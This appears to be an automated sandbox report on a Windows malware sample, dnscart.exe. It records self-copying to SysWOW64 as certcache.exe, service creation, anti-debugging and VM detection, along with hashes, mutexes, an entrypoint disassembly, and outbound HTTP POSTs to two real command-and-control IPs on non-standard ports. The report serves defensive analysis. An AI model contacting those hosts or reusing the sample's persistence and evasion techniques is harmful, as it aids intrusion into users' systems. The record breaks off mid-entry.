Source: global traffic | TCP traffic: 192.168.2.2:49159 -> 178.32.255.132:7080
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49158 -> 4143
Source: unknown | Network traffic detected: HTTP traffic on port 49159 -> 7080

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 2_2_00229960 StartServiceW,CloseServiceHandle,CloseServiceHandle | 2_2_00229960

Stealing of Sensitive Information:

Encrypts process information
Source: C:\Windows\SysWOW64\certcache.exe | Data encrypted: 216554_6C0D37D2%*WmiApSrv.exe,conhost.exe,WmiPrvSE.exe,explorer.exe,taskeng.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],2:
Source: C:\Windows\SysWOW64\certcache.exe | Data encrypted: 216554_6C0D37D2%*mscorsvw.exe,WmiApSrv.exe,conhost.exe,WmiPrvSE.exe,explorer.exe,taskeng.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],2:

Persistence and Installation Behavior:

Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\dnscart.exe | PE file moved: C:\Windows\SysWOW64\certcache.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\certcache.exe | Executable created and started: C:\Windows\SysWOW64\certcache.exe

Data Obfuscation:

Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .text entropy: 7.10790918737
PE file contains an invalid checksum
Source: dnscart.exe | Static PE information: real checksum: 0x1 should be: 0x2d77f
PE file contains sections with non-standard names
Source: dnscart.exe | Static PE information: section name: 6xOsN5y
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_00A1572F push ebp; retf | 1_2_00A15738
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_00A14ABA push ebp; ret | 1_2_00A14AC4
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_00A147E4 push 00000048h; iretd | 1_2_00A147E6
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00320116 push ebp; iretd | 8_2_00320118
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00328C69 push ss; retf 0018h | 8_2_00328C6C
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00331FAA pushad ; retn 0035h | 8_2_003323D1
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_003256E8 pushad ; retf | 8_2_003256E9
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0033C968 push eax; iretd | 8_2_0033C9B1
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0033CB42 push eax; retf 0033h | 8_2_0033CC39
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0033C95A push eax; retf 0033h | 8_2_0033C961
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00326AE8 pushad ; retf | 8_2_00326AE9
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0032F218 pushad ; retf | 8_2_0032F219
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0032E5A8 pushad ; retf | 8_2_0032E5A9
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00356558 pushad ; retf | 8_2_00356559
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_0035B54A pushad ; iretd | 8_2_0035B881
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_003520B0 pushad ; iretd | 8_2_003521D9
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_003521DA push ebp; iretd | 8_2_00352289
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_00392989 push E9448A66h; retf | 8_2_0039298E
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_003BA01D pushad ; retf 003Bh | 8_2_003BA0A9
Source: C:\Windows\System32\sppsvc.exe | Code function: 8_2_003A294A pushfd ; ret | 8_2_003A2C72

System Summary:

Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: dnscart.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
Source: dnscart.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbols
Source: Binary string: FntCache.pdb source: svchost.exe
Source: Binary string: wow64win.pdb source: certcache.exe, mscorsvw.exe
Source: Binary string: sppwinob.pdb source: sppsvc.exe
Source: Binary string: FntCache.pdbH source: svchost.exe
Source: Binary string: wow64cpu.pdb source: certcache.exe, mscorsvw.exe
Source: Binary string: wow64.pdbH source: certcache.exe, mscorsvw.exe
Source: Binary string: wow64win.pdbH source: certcache.exe, mscorsvw.exe
Source: Binary string: sppobjs.pdb source: sppsvc.exe
Source: Binary string: !!22ewW.pdb source: certcache.exe, dnscart.exe
Source: Binary string: sppsvc.pdb source: sppsvc.exe
Source: Binary string: wow64.pdb source: certcache.exe, mscorsvw.exe
Classification label
Source: classification engine | Classification label: mal56.troj.winEXE@11/1@0/3
Contains functionality to create services
Source: C:\Users\user\Desktop\dnscart.exe | Code function: CreateServiceW,2_2_002297B3
Source: C:\Windows\SysWOW64\certcache.exe | Code function: CreateServiceW,4_2_001397B3
Contains functionality to enum processes or threads
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_001F214F CreateToolhelp32Snapshot,1_2_001F214F
Contains functionality to modify services (start/stop/modify)
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 2_2_00229960 StartServiceW,CloseServiceHandle,CloseServiceHandle,2_2_00229960
PE file has an executable .text section and no other executable section
Source: dnscart.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\Desktop\dnscart.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\dnscart.exe | Key opened: HKEY_USERS\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\dnscart.exe 'C:\Users\user\Desktop\dnscart.exe'
Source: unknown | Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: unknown | Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
Source: unknown | Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown | Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Users\user\Desktop\dnscart.exe | Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: C:\Windows\SysWOW64\certcache.exe | Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\dnscart.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\dnscart.exe | Memory allocated: 77290000 page execute and read and write
Source: C:\Users\user\Desktop\dnscart.exe | Memory allocated: 77190000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe | Memory allocated: 77290000 page execute and read and write
Source: C:\Windows\SysWOW64\certcache.exe | Memory allocated: 77190000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Memory allocated: 77290000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Memory allocated: 77190000 page execute and read and write
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 2_2_00222220 CreateProcessAsUserW,2_2_00222220
Creates files inside the system directory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
Creates mutexes
Source: C:\Windows\SysWOW64\certcache.exe | Mutant created: \BaseNamedObjects\M49C95F14
Source: C:\Users\user\Desktop\dnscart.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I6C0D37D2
Source: C:\Users\user\Desktop\dnscart.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M6C0D37D2
Source: C:\Windows\SysWOW64\certcache.exe | Mutant created: \BaseNamedObjects\Global\I6C0D37D2
Source: C:\Users\user\Desktop\dnscart.exe | Mutant created: \Sessions\1\BaseNamedObjects\M7DE44FFE
Deletes Windows files
Source: C:\Users\user\Desktop\dnscart.exe | File deleted: C:\Windows\SysWOW64\certcache.exe:Zone.Identifier
Detected potential crypto function
PE file contains executable resources (Code or Archives)
Source: dnscart.exe | Static PE information: Resource name: RT_VERSION type: ump; VAX COFF executable not stripped - version 79
Reads the hosts file
Source: C:\Windows\SysWOW64\certcache.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\dnscart.exe | Process created: C:\Users\user\Desktop\dnscart.exe C:\Users\user\Desktop\dnscart.exe
Source: C:\Windows\SysWOW64\certcache.exe | Process created: C:\Windows\SysWOW64\certcache.exe C:\Windows\SysWOW64\certcache.exe

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\dnscart.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Windows\System32\sppsvc.exe | Process queried: DebugPort
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_001F1BE0 mov eax, dword ptr fs:[00000030h] 1_2_001F1BE0
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 2_2_00221BE0 mov eax, dword ptr fs:[00000030h] 2_2_00221BE0
Source: C:\Windows\SysWOW64\certcache.exe | Code function: 3_2_001A1BE0 mov eax, dword ptr fs:[00000030h] 3_2_001A1BE0
Source: C:\Windows\SysWOW64\certcache.exe | Code function: 4_2_00131BE0 mov eax, dword ptr fs:[00000030h] 4_2_00131BE0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\dnscart.exe | Code function: 1_2_001E2088 GetLastError,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,SetLastError,GetCurrentProcess,GetLastError,wsprintfA,SetLastError,GetCurrentProcessId,1_2_001E2088

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: sppsvc.exe | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: sppsvc.exe | Binary or memory string: SCSI\DISK&VEN_VMWARE_&PROD_VMWARE_VIRTUAL_S\5&22BE343F&0&000000
Program exit points
Source: C:\Windows\SysWOW64\certcache.exe | API call chain: ExitProcess graph end node graph_4-6574
Source: C:\Windows\SysWOW64\certcache.exe | API call chain: ExitProcess graph end node graph_4-6648
Queries a list of all running processes
Source: C:\Windows\SysWOW64\certcache.exe | Process information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\Users\user\Desktop\dnscart.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\dnscart.exe | Code function: EnumServicesStatusExW,OpenServiceW,2_2_0022985F
Source: C:\Users\user\Desktop\dnscart.exe | Code function: EnumServicesStatusExW,GetLastError,2_2_002297F3
Source: C:\Windows\SysWOW64\certcache.exe | Code function: EnumServicesStatusExW,OpenServiceW,4_2_0013985F
Source: C:\Windows\SysWOW64\certcache.exe | Code function: EnumServicesStatusExW,GetLastError,4_2_001397F3
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\dnscart.exe | API coverage: 6.2 %
Source: C:\Windows\SysWOW64\certcache.exe | API coverage: 5.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\dnscart.exe TID: 2284 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\SysWOW64\certcache.exe TID: 2700 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 2576 | Thread sleep time: -120000s >= -60000s

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49158 -> 4143
Source: unknown Network traffic detected: HTTP traffic on port 49159 -> 7080

Language, Device and Operating System Detection:

Contains functionality to query windows version
Source: C:\Users\user\Desktop\dnscart.exe Code function: 1_2_001F8DA0 RtlGetVersion,GetNativeSystemInfo,1_2_001F8DA0
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\dnscart.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\dnscart.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\certcache.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\modern.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\roman.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\script.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\coure.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\serife.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\sserife.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\smalle.fon VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\smallf.fon VolumeInformation

Behavior Graph

[Figure: behavior graph, ID 491. Sample: dnscart.exe. Start date: 23/01/2018. Architecture: WINDOWS. Score: 56. Process nodes: dnscart.exe, certcache.exe, svchost.exe and 4 other processes. certcache.exe contacts 178.32.255.132 (port 7080, OVHFR, France), 69.16.193.12 (port 4143, LIQUID-WEB-INC-LiquidWebLLCUS, United States) and 192.168.2.255 (unknown). Signatures shown: "Detected TCP or UDP traffic on non-standard ports", "Uses known network protocols on non-standard ports", "Drops executables to the windows directory (C:\Windows) and starts them", "Encrypts process information".]

Simulations

Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 21:07:28 | API Interceptor | 1x Sleep call for process: dnscart.exe modified from: 60000ms to: 1000ms |
| 21:07:46 | API Interceptor | 1x Sleep call for process: certcache.exe modified from: 60000ms to: 1000ms |
| 21:09:25 | API Interceptor | 2x Sleep call for process: WmiApSrv.exe modified from: 60000ms to: 1000ms |

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Startup

  • System is w7x64_hvm
  • dnscart.exe (PID: 2264 cmdline: 'C:\Users\user\Desktop\dnscart.exe' MD5: A992758B24FBB2A2E330558FB14A6DC7)
    • dnscart.exe (PID: 1844 cmdline: C:\Users\user\Desktop\dnscart.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)
  • certcache.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\certcache.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)
    • certcache.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\certcache.exe MD5: A992758B24FBB2A2E330558FB14A6DC7)
  • mscorsvw.exe (PID: 2756 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: BD2AE15EFB47E5215B4D0C59EA00C91A)
  • mscorsvw.exe (PID: 2792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: 30EAABE7A3B1081B6F5DDE4A1C0305D2)
  • svchost.exe (PID: 2828 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • sppsvc.exe (PID: 2868 cmdline: C:\Windows\system32\sppsvc.exe MD5: E17E0188BB90FAE42D83E98707EFA59C)
  • WmiApSrv.exe (PID: 2660 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 38B84C94C5A8AF291ADFEA478AE54F93)
  • cleanup

Created / dropped Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log
File Type:ASCII text, with CRLF line terminators
Size (bytes):226
Entropy (8bit):5.130289465463955
Encrypted:false
MD5:CF2DEA91A22FC52CE0F9E2CF3B0CB9BF
SHA1:7A78451A76E7001D4C3E412BD0708E9FDFF71F85
SHA-256:112B30C10E443383895E4157D6DEA738761EC3D748D68F4A76A3A577E722CC45
SHA-512:58D0D41077A759C7F7B05B1F6742B770A790B01DB4DE92474B67523C4EDF503C5891545C3AEE25365FF54BE098796756318B4D1BD832DB86C12E0DB37131D999
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

| IP | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|
| 69.16.193.12 | United States | 32244 | LIQUID-WEB-INC-LiquidWebLLCUS | true |
| 192.168.2.255 | unknown | unknown | unknown | false |
| 178.32.255.132 | France | 16276 | OVHFR | true |

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):6.65101379539173
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Java Script embedded in Visual Basic Script (1500/0) 0.01%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:dnscart.exe
File size:135168
MD5:a992758b24fbb2a2e330558fb14a6dc7
SHA1:701dd982ee1486bdb13fcd92a2f1c43d199b2a07
SHA256:2aba6e10f053484b005015107dd48b71ec1b7c9f70e0e6acfb70506852047a49
SHA512:dfc4165078802657ad8a9a997c080726cd8dee4d713098c7660ee1ff0595d282b9530a873f6e370b0423fc8d95f6a837480f71cc6fb903a6581ac2669753f266
File Content Preview:MZ......................@.......................................7...g!. be ........!..L.!ThrL. undern32.un!..$MZ......r...i..am must.This pro W.........PE..L...OLTZ.....................P......0.............@.......................... ............@........

Static PE Info

General

Entrypoint:0x41ad30
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5A544C4F [Tue Jan 09 04:59:59 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:816577adfff786c2b1d567c9184dd0f8

Entrypoint Preview

Instruction
mov eax, dword ptr [0041D3D8h]
mov eax, dword ptr [eax]
push eax
comiss xmm0, xmm0
pop eax
mov dword ptr [0041D3C0h], eax
mov dword ptr [0041D3C4h], eax
mov eax, dword ptr [esp+04h]
sub eax, 00000000h
add eax, 04h
je 0C914D35h
sub eax, 04h
mov dword ptr [0041D3C0h], esi
mov dword ptr [0041D3C4h], edi
mov dword ptr [0041D3D0h], esp
mov dword ptr [0041D3CCh], ebp
mov dword ptr [0041D3C8h], ebx
jmp 0C8FB44Dh
int3
mov dword ptr [ebp-04h], eax
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push ebx
push edi
and esp, FFFFFFF8h
sub esp, 18h
lea eax, dword ptr [0041D000h]
mov ecx, dword ptr [esp+08h]
mov edx, dword ptr [esp+0Ch]
mov ebx, ecx
mov dword ptr [esp+04h], ecx
mov cl, bl
mov esi, edx
shr esi, cl
mov cl, bl
mov edi, dword ptr [esp+04h]
shrd edi, edx, cl
xor edx, edx
test bl, 00000020h
cmovne edi, esi
cmovne esi, edx
mov dword ptr [esp+0Ch], esi
mov dword ptr [esp+08h], edi
lea esp, dword ptr [ebp-0Ch]
pop edi
pop ebx
pop esi
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 30h
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [esp+20h]
mov edx, dword ptr [esp+24h]
mov esi, ecx
add esi, EB938CA7h

Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f278 | 0xb5 | 6xOsN5y |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20000 | 0x518 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x21000 | 0x1e0 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1f050 | 0x38 | 6xOsN5y |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x1f000 | 0x50 | 6xOsN5y |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x1b3b8 | 0x1c000 | False | 0.597673688616 | data | 7.10790918737 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .data | 0x1d000 | 0x13e8 | 0x1000 | False | 0.088134765625 | data | 1.61918201861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| 6xOsN5y | 0x1f000 | 0x4c4 | 0x1000 | False | 0.177734375 | data | 1.74778543372 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x20000 | 0x518 | 0x1000 | False | 0.155517578125 | data | 2.07164982127 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x21000 | 0x1e0 | 0x1000 | False | 0.109619140625 | data | 1.09843051317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x200a0 | 0x178 | VAX COFF executable not stripped - version 79 | English | United States |
| RT_MANIFEST | 0x20218 | 0x2fa | ASCII text, with very long lines, with no line terminators | English | United States |

Imports

| DLL | Import |
|---|---|
| SETUPAPI.dll | SetupDiGetDeviceInterfaceDetailA |
| POWRPROF.dll | IsPwrSuspendAllowed, IsPwrShutdownAllowed |
| GDI32.dll | CreateDIBitmap |
| KERNEL32.dll | AreFileApisANSI, SetFileApisToOEM, HeapSize, SetFileApisToANSI |
| WS2_32.dll | WSACleanup |
| SHELL32.dll | DragAcceptFiles |
| pdh.dll | PdhUpdateLogW |
| RPCRT4.dll | RpcAsyncInitializeHandle |

Version Infos

| Description | Data |
|---|---|
| ProductVersion | 2.1.24 |
| FileVersion | 2.1.24 |
| ProductName | cyrus-sasl |
| Translation | 0x0400 0x04e4 |

Possible Origin

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

Network Behavior

TCP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 23, 2018 21:08:29.141274929 MEZ | 49158 | 4143 | 192.168.2.2 | 69.16.193.12 |
| Jan 23, 2018 21:08:29.141295910 MEZ | 4143 | 49158 | 69.16.193.12 | 192.168.2.2 |
| Jan 23, 2018 21:08:29.141455889 MEZ | 49158 | 4143 | 192.168.2.2 | 69.16.193.12 |
| Jan 23, 2018 21:08:29.142405033 MEZ | 49158 | 4143 | 192.168.2.2 | 69.16.193.12 |
| Jan 23, 2018 21:08:29.142414093 MEZ | 4143 | 49158 | 69.16.193.12 | 192.168.2.2 |
| Jan 23, 2018 21:08:59.697390079 MEZ | 49158 | 4143 | 192.168.2.2 | 69.16.193.12 |
| Jan 23, 2018 21:08:59.697458982 MEZ | 4143 | 49158 | 69.16.193.12 | 192.168.2.2 |
| Jan 23, 2018 21:08:59.697585106 MEZ | 49158 | 4143 | 192.168.2.2 | 69.16.193.12 |
| Jan 23, 2018 21:09:30.821098089 MEZ | 49159 | 7080 | 192.168.2.2 | 178.32.255.132 |
| Jan 23, 2018 21:09:30.821119070 MEZ | 7080 | 49159 | 178.32.255.132 | 192.168.2.2 |
| Jan 23, 2018 21:09:30.821271896 MEZ | 49159 | 7080 | 192.168.2.2 | 178.32.255.132 |
| Jan 23, 2018 21:09:30.822360992 MEZ | 49159 | 7080 | 192.168.2.2 | 178.32.255.132 |
| Jan 23, 2018 21:09:30.822371006 MEZ | 7080 | 49159 | 178.32.255.132 | 192.168.2.2 |
| Jan 23, 2018 21:10:01.382885933 MEZ | 49159 | 7080 | 192.168.2.2 | 178.32.255.132 |
| Jan 23, 2018 21:10:01.382961988 MEZ | 7080 | 49159 | 178.32.255.132 | 192.168.2.2 |
| Jan 23, 2018 21:10:01.383083105 MEZ | 49159 | 7080 | 192.168.2.2 | 178.32.255.132 |

HTTP Request Dependency Graph

  • 69.16.193.12:4143
  • 178.32.255.132:7080

HTTP Packets

Session ID:0
Source IP:192.168.2.2
Source Port:49158
Destination IP:69.16.193.12
Destination Port:4143
Process:C:\Windows\SysWOW64\certcache.exe
Timestamp:Jan 23, 2018 21:08:29.142405033 MEZ
kBytes transferred:0
Direction:OUT
Data:
POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 69.16.193.12:4143
Content-Length: 308
Connection: Keep-Alive
Cache-Control: no-cache


Session ID:1
Source IP:192.168.2.2
Source Port:49159
Destination IP:178.32.255.132
Destination Port:7080
Process:C:\Windows\SysWOW64\certcache.exe
Timestamp:Jan 23, 2018 21:09:30.822360992 MEZ
kBytes transferred:2
Direction:OUT
Data:
POST / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 178.32.255.132:7080
Content-Length: 308
Connection: Keep-Alive
Cache-Control: no-cache


Code Manipulations

System Behavior

General

Start time:21:07:17
Start date:23/01/2018
Path:C:\Users\user\Desktop\dnscart.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\dnscart.exe'
Imagebase:0xa10000
File size:135168 bytes
MD5 hash:A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:07:19
Start date:23/01/2018
Path:C:\Users\user\Desktop\dnscart.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\dnscart.exe
Imagebase:0xa10000
File size:135168 bytes
MD5 hash:A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:07:28
Start date:23/01/2018
Path:C:\Windows\SysWOW64\certcache.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\certcache.exe
Imagebase:0xa10000
File size:135168 bytes
MD5 hash:A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:07:30
Start date:23/01/2018
